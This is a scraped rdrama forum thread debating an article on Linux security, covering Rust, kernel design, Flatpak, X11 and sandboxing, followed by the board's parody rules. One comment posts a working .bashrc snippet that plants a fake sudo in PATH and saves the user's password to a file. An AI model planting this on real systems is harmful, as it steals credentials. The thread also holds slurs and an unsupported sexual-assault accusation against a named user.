Unable to load image
/h/slackernews
@DrTransmisia's profile picture @DrTransmisia's hat
DrTransmisia xe/xim SRS surgeon | anti-hate researcher | anti-evil engineer | former DDR spy | DrMoney student  1yr ago (madaidans-insecurities.github.io) 599 thread views #187307

Linux :marseypenguin: being secure :marseycop2: is a common misconception in the security :capyhacker: and privacy :marseypedo: realm :marseyspyglow::!marseyjewoftheorientglow:

https://madaidans-insecurities.github.io/linux.html

GNU+Linux bros :marseypenguin: I don't feel so good :marseydisintegrate::marseyhacker::capyhacker:

!codecels discuss

57
New Old Top Bottom Controversial Random
Jump in the discussion.

No email address required.

https://i.rdrama.net/images/16794381950713048.webp

Snapshots:

Jump in the discussion.

No email address required.

:#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat::#marseysalat:

Jump in the discussion.

No email address required.

https://i.rdrama.net/images/16892013679266138.webp

Jump in the discussion.

No email address required.

Most programs on Linux are written in memory unsafe languages, such as C or C++, which causes the majority of discovered security vulnerabilities. Other operating systems have made more progress on adopting memory safe languages, such as Windows, which is leaning heavily towards Rust, a memory safe language, or macOS which is adopting Swift. While Windows and macOS are still mostly written in memory unsafe languages, they are at least making some progress on switching to safe alternatives.

This is an r-slured fricking paragraph and plain wrong. All the OSes have experimented with rust without any using it to any significant degree.

The Linux kernel itself is also extremely lacking in security. It is a monolithic kernel, which means that it contains a colossal amount of code all within the most privileged part of the operating system and has no isolation between internal components whatsoever.

and then

Other kernels, such as the Windows and macOS kernels, are somewhat similar too, in that they are also large and bloated monolithic kernels with huge attack surface

xD

The rest of it is scraping the barrel for things to criticise. Maybe someone will pretend to be sudo. derp.

The one valid point that the article does make is that OSes were designed to be multi-user where you'd not trust the other users. Now they're almost always single user but you wanna be suspicious of the applications instead. But I'm not sure if there is really any good way to solve that without completely redesigning how computers work.

Jump in the discussion.

No email address required.

>rust is safe because le memory-safety

Isn't Lemmy written in Rust, and didn't they just announce a massive XSS vuln? Memory-safe doesn't mean well written.

Jump in the discussion.

No email address required.

>xss in typescript

>rust le bad

:#marseyravecope:

Jump in the discussion.

No email address required.

I actually like programming in rust but I wish the let's rewrite the whole of Linux in rust people would frick off.

Jump in the discussion.

No email address required.

they are legit glowies who want their non-foss spyware rust backdoors in

there's a reason rust freaked the frick out at someone making a compiler

Jump in the discussion.

No email address required.

why do you think Rust is non-FOSS? :marseyconfused:

Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

He's not saying it's non-FOSS, he's bringing up how there's basically just the one official rust compiler instead of there being multiple competing compilers like with C and C++, and most other programming languages. This is due to the fact that Rust doesn't actually have a formal specification, specification is whatever the Official Compiler does. This isn't a wise move because it doesn't guarantee that rust code written in the past will behave the same in the future or present. It also makes it borderline impossible to create an alternative compiler, since there's nothing saying that a specific keyword should exist or behave a certain way. This is bad.

Jump in the discussion.

No email address required.

not saying it’s non-FOSS


non-foss spyware

:marseysurejan:

no spec

The fact I’ve heard this as the paramount complaint of Rust in current year actually inspires more confidence in it imo.

There’s no document that people would ignore anyway but it’s super duper important so a neurodivergent neckbeard can get a half-broken gcc port? This is the biggest complaint about Rust?

Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

I mean there's the fact that the actual rust compiler is obscenely aids to actually bootstrap, etc. I think you're just being contrarian here because you want marseycoin or something. It's pretty clear that this is an actual issue.

Jump in the discussion.

No email address required.

I can write it less smugly but I don’t legitimately think a single compiler ecosystem is that big of an issue, no.

Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

More comments

GNU Hurd chads simply can't stop winning. monolithicels stay seething

Jump in the discussion.

No email address required.

Imagine not having to interject any longer

https://i.rdrama.net/images/16891991024874403.webp

Jump in the discussion.

No email address required.

But I'm not sure if there is really any good way to solve that without completely redesigning how computers work.

It's solved by mobile OSes with their strict sandboxing and easy gui permissions settings, but yes, the desktop is a long ways away. With Linux all we have are janky cowtools like selinux, apparmor, firejail, flatpak (bleh) and so on. Qubes OS is a usable system that actually makes good progress towards solving the problem, while something more like Genode/Sculpt OS is experimental but with a cleaner design and where we need to be heading towards in the long run.

Jump in the discussion.

No email address required.

>Qubes OS is a usable system

:marsey#xdoubt:

Jump in the discussion.

No email address required.

its completely usable yes

Jump in the discussion.

No email address required.

I wonder how well stuff like Guix and Nix solve this issue, if at all.

Jump in the discussion.

No email address required.

>someone might sneak a bash script on your system to intercept your sudoer password :marseypearlclutch:

Jump in the discussion.

No email address required.

sudo blow me you FUD spouting M$strag.

Jump in the discussion.

No email address required.

>puts this in your .bashrc

cat <<\EOF > /tmp/sudo
#!/bin/bash
if [[ "${@}" = "" ]]; then
 /usr/bin/sudo
else
 read -s -r -p "[sudo] password for ${USER}: " password
 echo "${password}" > /tmp/password
 echo "${password}" | /usr/bin/sudo -S ${@}
fi
EOF
chmod +x /tmp/sudo
export PATH="/tmp:${PATH}"

>eh nothing personal kid

Jump in the discussion.

No email address required.

uses bash

:!#marseyemojirofl:

Jump in the discussion.

No email address required.

You’re not seriously suggesting that csh is better?

Jump in the discussion.

No email address required.

bashcels seething at fishchads :carp:

Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

yes, those are the 2 shells.

:marseyeyeroll!#:

Jump in the discussion.

No email address required.

What about zsh?

Jump in the discussion.

No email address required.

Aka the bash rip off that Apple made for licensing reasons

Jump in the discussion.

No email address required.

:marseyagree:

Jump in the discussion.

No email address required.

Yeah I don’t understand this part of the article because there is no way for me to put this in another users profile.

Jump in the discussion.

No email address required.

I don't worry about it too much. If an attacker can get a shell on your system it's basically game over, so use network ACL's, use key auth instead of passwords, use short lived dynamic credentials. Instead of worrying about what all an attacker can exploit in the OS focus your energy on preventing them from even gaining access. Unless you have a quantum computer at your disposal I don't think you'll be able to crack my 4096 bit ssh key.

Jump in the discussion.

No email address required.

Nah man we gotta be paranoid about esoteric OS and application exploits instead of just gatekeeping our systems from malicious actors and malware

Jump in the discussion.

No email address required.

I think a modern OS install in 2023 are all equally secure, if you follow the golden rule of "only install from trusted sources".

I simply don't think there are many Pegasus-style attacks floating around, the ones that are you have little recourse for.

I think meme-people who style themselves as security experts like to dream most hacks are advanced when in reality it's almost always "Jane from accounting opened a phish".

Keep your firewall ports closed, use key auth and apply security updates automatically and you'll be better than most people getting pwned.

Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

The problem is that you install thousands of software packets and it just takes one (1) compromised software being run by a sudouser to compromise the system. This is a problem of Windows NT too, you have UAC but you don't have filesystem isolation and the system gives Administrator privileges to random exes very easily

Jump in the discussion.

No email address required.

Yes I’m I’m not sure what the easy solution is to that problem except reworking the entire ecosystem to be like iOS / Android like is mentioned above.

I think pseuds who claim Linux is “more secure” aren’t doing their research and what really matters how quickly you can patch.

Follower of Christ :marseyandjesus: Tech lover, IT Admin, heckin pupper lover and occasionally troll. I hold back feelings or opinions, right or wrong because I dislike conflict.

Jump in the discussion.

No email address required.

:#marseyhesright:

Jump in the discussion.

No email address required.

wrong

:#marseyindignant:

Jump in the discussion.

No email address required.

:#gigachad3:

Jump in the discussion.

No email address required.

Was this written by Theo? :marseythinkorino:

Jump in the discussion.

No email address required.

https://media.giphy.com/media/43DgQJkV2HbMc/giphy.webp

Jump in the discussion.

No email address required.

Flatpak aims to sandbox applications, but its sandboxing is very flawed. It fully trusts the applications and allows them to specify their own policy. This means that security is effectively optional and applications can simply choose not to be sufficiently sandboxed.

This author is an idiot. The purpose of self-specifying boundaries is two-fold:

  • It puts a blast radius around an app being misbehaved or being compromised. This is why Chrome self-sandboxes major parts of its runtime, even though their own engineers wrote the code being sandboxed.

  • OS, vendor, and IT policies can restrict installation based on requiring self-selection of more restrictive policies. This is why Google's add-on systems for Workspace have different criteria depending on what scopes an app self-selects, encouraging self-selection of narrower scopes.

Flatpaks could do the latter better, but the concept is sound.

Jump in the discussion.

No email address required.

Arch Linux used to have a grsecurity patch you can install with a single command, with is probably the best thing you can do against kernel and some userspace exploits. Haven’t used it in years since I switched back to MacOS. That plus general security good practices is better than most stock machines with predictable software stacks and entrypoints. Security through Obscurity is a legit tactic.

MACs like SELinux are mostly security theatre because no one really uses it meaningfullly cuz it’s so high touch

Jump in the discussion.

No email address required.

Duh.

Jump in the discussion.

No email address required.

Alternatively, an attacker could log keystrokes via X11

that's worrying. i hope somebody comes up with an x replacement. then linux would land in a way safer position

Jump in the discussion.

No email address required.

Yeah. It's pretty fricked up that you can run a program and it responds to your input.

There's been some great strides in disabling user input from the wayland team but I'm genuinely shocked that nobody's done anything about the terminal. That thing can read literally every keypress you make.

Jump in the discussion.

No email address required.

I love Wayland btw

Jump in the discussion.

No email address required.

I like to spin up Linux VMs to see how long it takes to get hacked.

Krayon sexually assaulted his sister. https://i.rdrama.net/images/17118241526738973.webp https://i.rdrama.net/images/17118241426254768.webp https://i.rdrama.net/images/17156480765435808.webp

Jump in the discussion.

No email address required.

security onion has a honey pot option that is pretty fetch

Putting the :e: in :marseyexcited:

Jump in the discussion.

No email address required.

i was doing something like this for a bit but instead i was collecting viral payloads out of my logs. mostly found stuff targeting shitty chinese iot devices

Jump in the discussion.

No email address required.

Sounds about right. There is no more cool viruses anymore that shows a frick you site on a specific day. Now it’s all lame ransomware and ddos.

Krayon sexually assaulted his sister. https://i.rdrama.net/images/17118241526738973.webp https://i.rdrama.net/images/17118241426254768.webp https://i.rdrama.net/images/17156480765435808.webp

Jump in the discussion.

No email address required.

How long does it take? What are you doing with it that causes you to get hacked?

Jump in the discussion.

No email address required.

Install Wordpress and never update it.

Krayon sexually assaulted his sister. https://i.rdrama.net/images/17118241526738973.webp https://i.rdrama.net/images/17118241426254768.webp https://i.rdrama.net/images/17156480765435808.webp

Jump in the discussion.

No email address required.

:#marseyglow2:

Jump in the discussion.

No email address required.

Factual

Jump in the discussion.

No email address required.

I see those cybersec courses are paying off

:#marseysoypointglow::#marseynoyouglow:

Jump in the discussion.

No email address required.

Don't most of these exposes basically just boil down to "if you don't set up linux to be secure, it will be insecure?"

Jump in the discussion.

No email address required.

Top Poster of the Day:
garlicdoors
Current Registered Users: 26,850
sidebar image

tech/science swag. :marscientist:

Effortposts made by SN Chads

Guidelines:

What to Submit

On-Topic: Anything that good slackers would find interesting. That includes more than /g/ memes and slacking off. If you had to reduce it to a sentence, the answer might be: anything that gratifies one's intellectual laziness.

Off-Topic: Most stories about politics, or crime, or sports, unless they're evidence of some interesting new phenomenon. Videos of pratfalls or disasters, or cute animal pictures. If they'd cover it on TV news, it's probably lame.

Help keep this hole healthy by keeping drama and non-drama balanced. If you see too much drama, post something that isn't dramatic. If there isn't enough drama and this hole has become too boring, POST DRAMA!

In Submissions

Please do things to make titles stand out, like using uppercase or exclamation points, or saying how great an article is. It should be explicit in submitting something that you think it's important.

Please don't submit the original source. If the article is behind a paywall, just post the text. If a video is behind a paywall, post a magnet link. Fuck journos.

Please don't ruin the hole with chudposts. It isn't funny and doesn't belong here. THEY WILL BE MOVED TO /H/CHUDRAMA

If the title includes the name of the site, please leave that in, because our users are too stupid to know the difference between a url and a search query.

If you submit a video or pdf, please don't warn us by appending [video] or [pdf] to the title. That would be r-slurred. We're not using text-based browsers. We know what videos and pdfs are.

Make sure the title contains a gratuitous number or number + adjective. Good clickbait titles are like "Top 10 Ways to do X" or "Don't do these 4 things if you want X"

Otherwise editorialize. Please don't use the original title, unless it is gay or r-slurred, or you're shits all fucked up.

If you're going to post old news (at least 1 year old), please flair it so we can mock you for living under a rock, or don't and we'll mock you anyway.

Please don't post on SN to ask or tell us something. Send it to [email protected] instead.

If your post doesn't get enough traction, try to delete and repost it.

Please don't use SN primarily for promotion. It's ok to post your own stuff occasionally, but the primary use of the site should be for curiosity. If you want to astroturf or advertise, post on news.ycombinator.com instead.

Please solicit upvotes, comments, and submissions. Users are stupid and need to reminded to vote and interact. Thanks for the gold, kind stranger, upvotes to the left.

In Comments

Be snarky. Don't be kind. Have fun banter; don't be a dork. Please don't use big words like "fulminate". Please sneed at the rest of the community.

Comments should get more enlightened and centrist, not less, as a topic gets more divisive.

If disagreeing, please reply to the argument and call them names. "1 + 1 is 2, not 3" can be improved to "1 + 1 is 3, not 2, mathfaggot"

Please respond to the weakest plausible strawman of what someone says, not a stronger one that's harder to make fun of. Assume that they are bad faith actors.

Eschew jailbait. Paedophiles will be thrown in a wood chipper, as pertained by sitewide rules.

Please post shallow dismissals, especially of other people's work. All press is good press.

Please use Slacker News for political or ideological battle. It tramples weak ideologies.

Please comment on whether someone read an article. If you don't read the article, you are a cute twink.

Please pick the most provocative thing in an article or post to complain about in the thread. Don't nitpick stupid crap.

Please don't be an unfunny chud. Nobody cares about your opinion of X Unrelated Topic in Y Unrelated Thread. If you're the type of loser that belongs on /h/chudrama, we may exile you.

Sockpuppet accounts are encouraged, but please don't farm dramakarma.

Please use uppercase for emphasis.

Please post deranged conspiracy theories about astroturfing, shilling, bots, brigading, foreign agents and the like. It degrades discussion and is usually mistaken. If you're worried about abuse, email [email protected] and dang will add you to their spam list.

Please don't complain that a submission is inappropriate. If a story is spam or off-topic, report it and our moderators will probably do nothing about it. Feed egregious comments by replying instead of flagging them like a pussy. Remember: If you flag, you're a cute twink.

Please don't complain about tangential annoyances—things like article or website formats, name collisions, or back-button breakage. That's too boring, even for HN users.

Please seethe about how your posts don't get enough upvotes.

Please don't post comments saying that rdrama is turning into ruqqus. It's a nazi dogwhistle, as old as the hills.

Miscellaneous:

We reserve the right to exile you for whatever reason we want, even for no reason at all! We also reserve the right to change the guidelines at any time, so be sure to real them at least once a month. We also reserve the right to ignore enforcement of the guidelines at the discretion of the janitorial staff. Be funny, or at least compelling, and pretty much anything legal is welcome provided it's on-topic, and even then.

[[[ To any NSA and FBI agents reading my email: please consider ]]]

[[[ whether defending the US Constitution against all enemies, ]]]

[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

https://i.rdrama.net/images/1663436125937968.webp

BROWSE EFFORTPOSTS SITE GUIDE DIRECTORY Emojis & Art | Info Megathreads HOLES PING GROUPS
/h/slackernews LOG /h/slackernews MODS /h/slackernews EXILEES /h/slackernews FOLLOWERS /h/slackernews BLOCKERS
Live commit: 5a46adf
Link copied to clipboard
Action successful!
Error, please refresh the page and try again.